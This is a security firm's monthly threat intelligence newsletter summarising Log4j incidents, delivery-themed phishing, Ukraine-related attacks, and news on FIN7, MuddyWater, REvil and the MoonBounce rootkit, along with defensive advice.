Log4j, Log4j and more Log4j! If anything, the month of January has taught us that even the most trivial of vulnerabilities can cause absolute havoc for organisations. The main reasons it was exploited so successfully was firstly because Apache is so widespread, and secondly because the servers using Apache are typically Internet facing as it is a web server by nature! Luckily for us in the Integrity360 Cyber Threat Response team, it was quite simple to detect successful executions from local Apache logs and progress the investigation from there.
However, we did have one incident where an attacker had attempted to clear the logs, but they weren’t very intelligent as they only removed the exploit log entries, meaning we could use the obvious gap in time to get the initial access timestamp. In terms of successful lateral movement from the exploited web servers, the more severe incidents tended to happen in customers that did not properly segment their networks. Proper DMZ segregation is an absolute must for organisations that host external web servers. It also goes without saying (we have to say it unfortunately) that your backend database should not be on the same server as your website front end, let alone the same network!
In other news, we have seen a big shift in the topics of social engineering and phishing emails from COVID-19 to delivery company emails. Currently as I type this, 27 out of the last 100 spam emails I’ve received claim to be fake deliveries from DHL. With most things being ordered online these days, we can only see this rising. The problem is that organisations such as Banks, can tell customers that they never send texts or emails asking them to log in (which is true), but delivery companies such as DHL, use texts and emails as their primary method of sending the customer their tracking URL and updates. We urge all recipients of potential delivery emails and texts to always double check that the tracking URL matches the official domain of the delivery company. Of course, if you aren’t expecting a delivery then why open it in the first place!? As tensions rise in eastern Europe with Ukraine and Russia, we expect to see a huge rise in cyber-espionage in the area. As a result of this, we have been providing several consultations for organisations who have offices/locations in these locations. One of the most effective ways to de-stabilise a country is by attacking its IT infrastructure. We will most likely have more about this next month, whilst we monitor the situation closely.
As mentioned in the introductory note, cyber-espionage in Eastern Europe is on the rise. Ukraine was recently hit by a large-scale cyber-attack that took down several of its government and ministries websites. Threat actors defaced the Foreign Affairs website with threatening message reading “Ukrainians!… All information about you has become public, be afraid and expect worse.”
Researchers additionally found evidence of malware disguised as ransomware that could render a system inoperable. It works in the same way that ransomware does, except it essentially throws away the key, making the data un-decryptable. This suggests that the goal is espionage/disruption, rather than financial gain.
Threat actors heavily linked to Russian intelligence services have been identified deploying a completely new stealthy malware variant named TrailBlazer since mid-2019, however it has remained undetected until recently. This malware utilises the Windows Management Instrumentation (WMI) event subscriptions for persistence as its largely fileless, this technique was unusual in 2019. Furthermore, C2 communication attempted to remain undetected using Google notification HTTP traffic and likely involved compromised infrastructure.
One of our red team’s favourite stories is where an analyst disguised himself in a pizza delivery uniform and craftily dropped a few USB drives around the company he was “delivering to”. It resulted in multiple high ranking employees plugging them in and a full compromise of the organisation.
FIN7, a financially motivated threat group, have recently been sending malicious USB devices through the US postal services, hoping to infect organizations in the transportation, insurance and defense industries. Once plugged in, the device will execute a BadUSB attack and run PowerShell commands for further exploitation.
In early January, the US Cyber Command released details of multiple open-source tools used by the Iran-linked advanced persistent threat (APT) group “MuddyWater”. The group has reportedly used DLL side-loading to trick legitimate programs into running malware, and has obfuscated PowerShell scripts to hide malicious command-and-control functions. MuddyWater was found to be part of the Iranian Ministry of Intelligence and Security and conducts domestic and overseas surveillance in the oil, gas and telecommunications sectors.
In early January, the FSB conducted a series of raids resulting in the arrest of several members of the Russia-based REvil ransomware gang. The FSB reported that the arrests were carried out at the request of the US, and that the detainees had been charged with “illegal turnover of means of payments.” According to the FSB, the following was seized: − More than RUB 426 million in fiat and cryptocurrency − More than USD 600,000 − More than EUR 500,000 − Cryptocurrency wallets − 20 cars − Computer equipment In addition, the FSB claimed to have “neutralized” REvil’s online infrastructure. Fourteen individuals were arrested initially, with an additional six arrested later.
The Vietnamese trading platform ONUS was victim of a ransomware attack leveraging the Log4j flaw on its payment system. Cyber criminals demanded a $5 million ransom in a double extortion scheme. ONUS refused to pay, so threat actors published for sale records of 2 million ONUS customers.
A new UEFI firmware-level rootkit dubbed MoonBounce has been deployed by the Chinese-speaking group APT41, aka Winnti. Researchers found that the backdoor is used to enable the deployment of user-mode malware that will execute further payloads from the internet.
Whilst there are still a minority of organisations cleaning up from the Log4j mess in December and early January, we would say most organisations are now comfortable defending against Log4j exploits as we progress into February. Some of the best advice we can give is that just because no alarms were tripped, does not mean that a compromise did not take place.
In our experience, we have seen attackers remain dormant in victims’ networks for many months, even years before becoming active. It is also becoming increasingly common for attackers to specialise in one section of the breach (e.g. initial access), then “sell” their access to another attacker who delivers the payload.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.
This is my disclaimer